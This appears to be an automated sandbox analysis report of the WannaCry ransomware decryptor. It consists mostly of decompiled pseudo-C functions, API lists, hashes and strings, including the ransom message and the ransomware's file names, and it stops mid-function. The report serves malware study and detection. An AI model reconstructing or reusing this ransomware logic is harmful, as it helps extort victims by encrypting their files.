                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                                      • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                                      • API String ID: 139182656-2046724789
                                                      • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                                      • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                                      • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00404090(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _t16;
                                                      				intOrPtr _t34;
                                                      				intOrPtr _t39;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413739);
                                                      				_t16 =  *[fs:0x0];
                                                      				_push(_t16);
                                                      				 *[fs:0x0] = _t39;
                                                      				_push(__ecx);
                                                      				_t34 = __ecx;
                                                      				_v16 = __ecx;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx)) = 0x415d70;
                                                      				_v4 = 0;
                                                      				L00412DA6();
                                                      				_v4 = 1;
                                                      				L00412DA6();
                                                      				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
                                                      				_push(0x421798);
                                                      				_v4 = 3;
                                                      				 *((intOrPtr*)(__ecx)) = 0x415cb0;
                                                      				L00412DA0();
                                                      				_push(_t16);
                                                      				L00412D9A();
                                                      				 *((char*)(__ecx + 0x5a)) = 0;
                                                      				 *((char*)(__ecx + 0x58)) = 0;
                                                      				 *((char*)(__ecx + 0x59)) = 0;
                                                      				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
                                                      				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
                                                      				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t34;
                                                      			}









                                                      APIs
                                                      • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                                      • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                                      • #860.MFC42(00421798), ref: 004040F6
                                                      • #858.MFC42(00000000,00421798), ref: 004040FE
                                                      • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                                      • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #540CursorLoad$#567#858#860
                                                      • String ID: 0ZA
                                                      • API String ID: 2440951079-2594568282
                                                      • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction ID: e4089f7d30d89e223e5e607c52669a324e752666537a285565f49de8eb968109
                                                      • Opcode Fuzzy Hash: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
                                                      • Instruction Fuzzy Hash: 20119071244B909FC320DF1AC941B9AFBE8BBC5704F80492EE18693741C7FDA4488B99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 86%
                                                      			E00407CB0() {
                                                      				char _v8;
                                                      				intOrPtr _v16;
                                                      				char _v28;
                                                      				char _v40;
                                                      				void* _v104;
                                                      				void* _v168;
                                                      				char _v260;
                                                      				void* _v264;
                                                      				char* _t24;
                                                      				intOrPtr _t34;
                                                      				intOrPtr* _t35;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413F77);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t34;
                                                      				_t35 = _t34 - 0xfc;
                                                      				E004030E0( &_v260, 0);
                                                      				_v8 = 0;
                                                      				L00412B72();
                                                      				_v8 = 1;
                                                      				_t24 =  &_v28;
                                                      				_v28 = 0x415c00;
                                                      				 *_t35 = _t24;
                                                      				_v8 = 5;
                                                      				L00412D52();
                                                      				_v28 = 0x415bec;
                                                      				 *_t35 =  &_v40;
                                                      				_v40 = 0x415c00;
                                                      				_v8 = 6;
                                                      				L00412D52();
                                                      				_v40 = 0x415bec;
                                                      				_v8 = 2;
                                                      				L00412D4C();
                                                      				_v8 = 1;
                                                      				L00412D3A();
                                                      				_v8 = 0xffffffff;
                                                      				L00412C86();
                                                      				 *[fs:0x0] = _v16;
                                                      				return _t24;
                                                      			}














                                                      APIs
                                                        • Part of subcall function 004030E0: #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
                                                        • Part of subcall function 004030E0: #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
                                                      • #2514.MFC42 ref: 00407CE5
                                                      • #2414.MFC42 ref: 00407D1A
                                                      • #2414.MFC42 ref: 00407D4F
                                                      • #616.MFC42 ref: 00407D6E
                                                      • #693.MFC42 ref: 00407D7F
                                                      • #641.MFC42 ref: 00407D93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#567$#2514#324#616#641#693
                                                      • String ID: [A$[A
                                                      • API String ID: 3779294304-353784214
                                                      • Opcode ID: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction ID: 921579082029cd8bb4f4eae6bba3465eb1c6e4c5ad01fea5c96a88f9cf2edf1e
                                                      • Opcode Fuzzy Hash: 8cb0ee6c83bcfaf23f1674bf443e371668351bddcb93b585418f44b11fe32095
                                                      • Instruction Fuzzy Hash: B511A7B404D7C1CBD334DF14C255BEEBBE4BBA4714F40891EA5D947681EBB81188CA57
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E0040C240(void* __ecx, void* __eflags, void _a4048, char _a4060, intOrPtr _a9148, int _a9156, int _a9168, char* _a9200, intOrPtr _a9208, long _a9220, int _a9224, intOrPtr _a9228, intOrPtr _a9232, char _a9236, char _a9240, struct HWND__* _a9272) {
                                                      				char _v0;
                                                      				char _v4;
                                                      				char _v8;
                                                      				char _v12;
                                                      				char _v16;
                                                      				char _v20;
                                                      				char _v24;
                                                      				char _v32;
                                                      				char _v34;
                                                      				long _v36;
                                                      				char _v40;
                                                      				char _v48;
                                                      				char _v56;
                                                      				char _v64;
                                                      				char _v65;
                                                      				char _v68;
                                                      				int _v76;
                                                      				char _v77;
                                                      				void* _t57;
                                                      				intOrPtr* _t68;
                                                      				signed int _t76;
                                                      				struct HWND__* _t92;
                                                      				intOrPtr* _t113;
                                                      				intOrPtr* _t114;
                                                      				intOrPtr* _t118;
                                                      				intOrPtr* _t120;
                                                      				long _t133;
                                                      				struct _IO_FILE* _t136;
                                                      				struct HWND__* _t138;
                                                      				signed int _t140;
                                                      				int _t141;
                                                      				intOrPtr _t143;
                                                      				void* _t144;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E004142DB);
                                                      				 *[fs:0x0] = _t143;
                                                      				E00413060(0x240c, __ecx,  *[fs:0x0]);
                                                      				_push(_t140);
                                                      				E0040DBB0( &_v0, 0x1000);
                                                      				_a9220 = 0;
                                                      				_push( &_v4);
                                                      				_t141 = _t140 | 0xffffffff;
                                                      				_t57 = E0040BED0(_a9228, _a9232, 0xc);
                                                      				_t144 = _t143 + 0x10;
                                                      				if(_t57 == 0) {
                                                      					_t138 = _a9272;
                                                      					if(_t138 != 0) {
                                                      						SendMessageA(_t138, 0x4e20, 0, 0);
                                                      					}
                                                      					_push(8);
                                                      					_push(_a9240);
                                                      					E0040DC00( &_v0);
                                                      					_v12 = _a9236;
                                                      					_push(4);
                                                      					_push( &_v12);
                                                      					E0040DC00( &_v8);
                                                      					E0040DD00( &_v16, _a9240);
                                                      					E0040DD00( &_v20, _a9240);
                                                      					_push(1);
                                                      					_push( &_v34);
                                                      					_v34 = _a9240;
                                                      					E0040DC00( &_v24);
                                                      					_t133 = _a9220;
                                                      					_push(4);
                                                      					_push( &_v36);
                                                      					_v36 = _t133;
                                                      					E0040DC00( &_v32);
                                                      					_push(_t133);
                                                      					_push(_a9208);
                                                      					E0040DC00( &_v40);
                                                      					_t68 =  *0x422210; // 0xb828e8
                                                      					_push(0);
                                                      					_push(E0040DD40( &_v48));
                                                      					_push(E0040DD30( &_v48));
                                                      					_push(7);
                                                      					if( *((intOrPtr*)( *_t68 + 0x18))() >= 0) {
                                                      						if(_t138 != 0) {
                                                      							SendMessageA(_t138, 0x4e21, 0, 0);
                                                      						}
                                                      						_t113 =  *0x422210; // 0xb828e8
                                                      						_push( &_v64);
                                                      						_push( &_a4060);
                                                      						_v64 = 0x13ec;
                                                      						_push( &_v65);
                                                      						if( *((intOrPtr*)( *_t113 + 0x1c))() >= 0) {
                                                      							if(_v77 == 7) {
                                                      								_t141 = 0;
                                                      								if(_v76 > 0) {
                                                      									_t136 = fopen(_a9200, "wb");
                                                      									_t144 = _t144 + 8;
                                                      									if(_t136 != 0) {
                                                      										fwrite( &_a4048, 1, _v76, _t136);
                                                      										fclose(_t136);
                                                      										_t144 = _t144 + 0x14;
                                                      										_t141 = 1;
                                                      									}
                                                      								}
                                                      							}
                                                      							if(_t138 != 0) {
                                                      								SendMessageA(_t138, 0x4e22, _t141, 0);
                                                      							}
                                                      							_t114 =  *0x422210; // 0xb828e8
                                                      							 *((intOrPtr*)( *_t114 + 0xc))();
                                                      							_a9156 = 0xffffffff;
                                                      							L23:
                                                      							E0040DBF0( &_v68);
                                                      							_t76 = _t141;
                                                      						} else {
                                                      							if(_t138 != 0) {
                                                      								SendMessageA(_t138, 0x4e22, 0xffffffff, 0);
                                                      							}
                                                      							_t118 =  *0x422210; // 0xb828e8
                                                      							 *((intOrPtr*)( *_t118 + 0xc))();
                                                      							_a9156 = 0xffffffff;
                                                      							_t76 = E0040DBF0( &_v68) | 0xffffffff;
                                                      						}
                                                      						goto L24;
                                                      					} else {
                                                      						if(_t138 != 0) {
                                                      							SendMessageA(_t138, 0x4e21, 0xffffffff, 0);
                                                      						}
                                                      						_t120 =  *0x422210; // 0xb828e8
                                                      						 *((intOrPtr*)( *_t120 + 0xc))();
                                                      						_a9168 = 0xffffffff;
                                                      						_t76 = E0040DBF0( &_v56) | 0xffffffff;
                                                      						L24:
                                                      						 *[fs:0x0] = _a9148;
                                                      						return _t76;
                                                      					}
                                                      				}
                                                      				_t92 = _a9272;
                                                      				if(_t92 != 0) {
                                                      					SendMessageA(_t92, 0x4e20, _t141, 0);
                                                      				}
                                                      				_a9224 = _t141;
                                                      				goto L23;
                                                      			}




































                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2B6
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C2E3
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C3B7
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C3EE
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C427
                                                      • fopen.MSVCRT ref: 0040C46B
                                                      • fwrite.MSVCRT ref: 0040C489
                                                      • fclose.MSVCRT ref: 0040C48F
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C4A9
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823fclosefopenfwrite
                                                      • String ID:
                                                      • API String ID: 1132507536-0
                                                      • Opcode ID: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction ID: 95d53ca3448e84e776e95c4e63a8e9d5249152c92c36a986718404cc297984b8
                                                      • Opcode Fuzzy Hash: 8015c574444b46ea95aa7a5c372928425bf19f7a7df4c5ec4de0add245179140
                                                      • Instruction Fuzzy Hash: F171F471204341EBD220DF51CC85FABB7E8FF88714F004B2EB6546B2D1CA78A909C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00401A90(CHAR* _a4, long _a8, DWORD* _a12) {
                                                      				struct _STARTUPINFOA _v68;
                                                      				struct _PROCESS_INFORMATION _v84;
                                                      				void* _t21;
                                                      				long _t25;
                                                      				DWORD* _t30;
                                                      
                                                      				_v68.cb = 0x44;
                                                      				_t21 = memset( &(_v68.lpReserved), 0, 0x10 << 2);
                                                      				_v84.hThread = _t21;
                                                      				_v84.dwProcessId = _t21;
                                                      				_v84.dwThreadId = _t21;
                                                      				_v84.hProcess = 0;
                                                      				_v68.dwFlags = 1;
                                                      				_v68.wShowWindow = 0;
                                                      				if(CreateProcessA(0, _a4, 0, 0, 0, 0x8000000, 0, 0,  &_v68,  &_v84) == 0) {
                                                      					return 0;
                                                      				} else {
                                                      					_t25 = _a8;
                                                      					if(_t25 != 0) {
                                                      						if(WaitForSingleObject(_v84.hProcess, _t25) != 0) {
                                                      							TerminateProcess(_v84.hProcess, 0xffffffff);
                                                      						}
                                                      						_t30 = _a12;
                                                      						if(_t30 != 0) {
                                                      							GetExitCodeProcess(_v84.hProcess, _t30);
                                                      						}
                                                      					}
                                                      					CloseHandle(_v84);
                                                      					CloseHandle(_v84.hThread);
                                                      					return 1;
                                                      				}
                                                      			}

                                                      APIs
                                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00401AE3
                                                      • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401AFB
                                                      • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B31
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 00401B38
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$CloseHandle$CodeCreateExitObjectSingleTerminateWait
                                                      • String ID: D
                                                      • API String ID: 786732093-2746444292
                                                      • Opcode ID: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction ID: a0d0216a4cd299e90b964b762458f17e6b97ac91bf96c8f45188d14ebb685e04
                                                      • Opcode Fuzzy Hash: 8373994cf4ca8ab825e0652bf8987f65ecb589941da35eb0d7e9f8387e0e63d6
                                                      • Instruction Fuzzy Hash: 4611F7B1618311AFD310CF69C884A9BBBE9EFC8750F50892EF598D2260D774D844CBA6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
                                                      • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
                                                      • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
                                                      • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                                      • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E00407F80(void* __ecx) {
                                                      				struct _IO_FILE* _t24;
                                                      				void* _t30;
                                                      				void* _t37;
                                                      				void* _t38;
                                                      				signed int _t45;
                                                      				signed int _t48;
                                                      				signed int _t51;
                                                      				unsigned int _t53;
                                                      				signed int _t54;
                                                      				void* _t66;
                                                      				struct _IO_FILE* _t76;
                                                      				void* _t77;
                                                      				void* _t78;
                                                      				void* _t79;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t84;
                                                      				void* _t85;
                                                      
                                                      				_t79 = __ecx;
                                                      				 *((char*)(_t81 + 0xc)) = 0;
                                                      				memset(_t81 + 0xd, 0, 0xc << 2);
                                                      				_t82 = _t81 + 0xc;
                                                      				asm("stosb");
                                                      				 *((intOrPtr*)(_t82 + 0x40)) = 0;
                                                      				memset(_t82 + 0x44, 0, 0x21 << 2);
                                                      				_t24 = fopen("00000000.res", "rb");
                                                      				_t76 = _t24;
                                                      				_t84 = _t82 + 0x14;
                                                      				_t89 = _t76;
                                                      				if(_t76 != 0) {
                                                      					fread(_t84 + 0x48, 0x88, 1, _t76);
                                                      					fclose(_t76);
                                                      					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
                                                      					_t45 = _t84 + 0x60;
                                                      					_push(_t84 + 0x2c);
                                                      					_t66 = _t79 + 0x5f0;
                                                      					_push("+++");
                                                      					_push(_t45);
                                                      					_push(_t66);
                                                      					_t30 = E0040C4F0(_t38, _t45, _t89);
                                                      					_t85 = _t84 + 0x30;
                                                      					_t77 = _t30;
                                                      					E0040C670();
                                                      					_t90 = _t77 - 0xffffffff;
                                                      					if(_t77 == 0xffffffff) {
                                                      						_push(_t85 + 0xc);
                                                      						_push("+++");
                                                      						_push(_t85 + 0x40);
                                                      						_push(_t66);
                                                      						_t37 = E0040C4F0(_t38, _t45, _t90);
                                                      						_t85 = _t85 + 0x10;
                                                      						_t77 = _t37;
                                                      					}
                                                      					_t24 = E0040C670();
                                                      					if(_t77 == 1) {
                                                      						_t24 = 0;
                                                      						asm("repne scasb");
                                                      						_t48 =  !(_t45 | 0xffffffff) - 1;
                                                      						if(_t48 >= 0x1e) {
                                                      							asm("repne scasb");
                                                      							_t51 =  !(_t48 | 0xffffffff) - 1;
                                                      							if(_t51 < 0x32) {
                                                      								asm("repne scasb");
                                                      								_t53 =  !(_t51 | 0xffffffff);
                                                      								_t78 = _t85 + 0xc - _t53;
                                                      								_t54 = _t53 >> 2;
                                                      								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
                                                      								return E00401A10(_t79 + 0x50c, 0);
                                                      							}
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t24;
                                                      			}

                                                      APIs
                                                      • fopen.MSVCRT ref: 00407FBD
                                                      • fread.MSVCRT ref: 00407FDD
                                                      • fclose.MSVCRT ref: 00407FE4
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                                        • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy$fclosefopenfread
                                                      • String ID: +++$00000000.res$s.wnry
                                                      • API String ID: 3363958884-869915597
                                                      • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                                      • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00403860(void* __ecx) {
                                                      				int _t6;
                                                      				long _t7;
                                                      				void* _t9;
                                                      				void* _t14;
                                                      
                                                      				_t14 = __ecx;
                                                      				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
                                                      				_push(0);
                                                      				if(_t6 != 0xffffffff) {
                                                      					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
                                                      					if(_t7 != 0) {
                                                      						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
                                                      						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
                                                      						 *(_t14 + 0xf4) = _t9;
                                                      						return _t9;
                                                      					}
                                                      					return _t7;
                                                      				} else {
                                                      					_push(0);
                                                      					_push("Please select a host to decrypt.");
                                                      					L00412CC8();
                                                      					return _t6;
                                                      				}
                                                      			}

                                                      APIs
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                                      • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                                      • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                                      Strings
                                                      • Please select a host to decrypt., xrefs: 00403885
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1200CreateThread
                                                      • String ID: Please select a host to decrypt.
                                                      • API String ID: 3616405048-3459725315
                                                      • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                                      • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E004044C0(void* __ecx, long _a4) {
                                                      				struct tagLOGFONTA _v72;
                                                      				long _t10;
                                                      				struct HFONT__* _t13;
                                                      				struct HWND__* _t15;
                                                      				void* _t21;
                                                      
                                                      				_t10 = _a4;
                                                      				_t21 = __ecx;
                                                      				if(_t10 != 0) {
                                                      					L2:
                                                      					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
                                                      					_v72.lfUnderline = 1;
                                                      					_t13 = CreateFontIndirectA( &_v72);
                                                      					_push(_t13);
                                                      					L00412D5E();
                                                      					 *((char*)(_t21 + 0x58)) = 1;
                                                      					return _t13;
                                                      				}
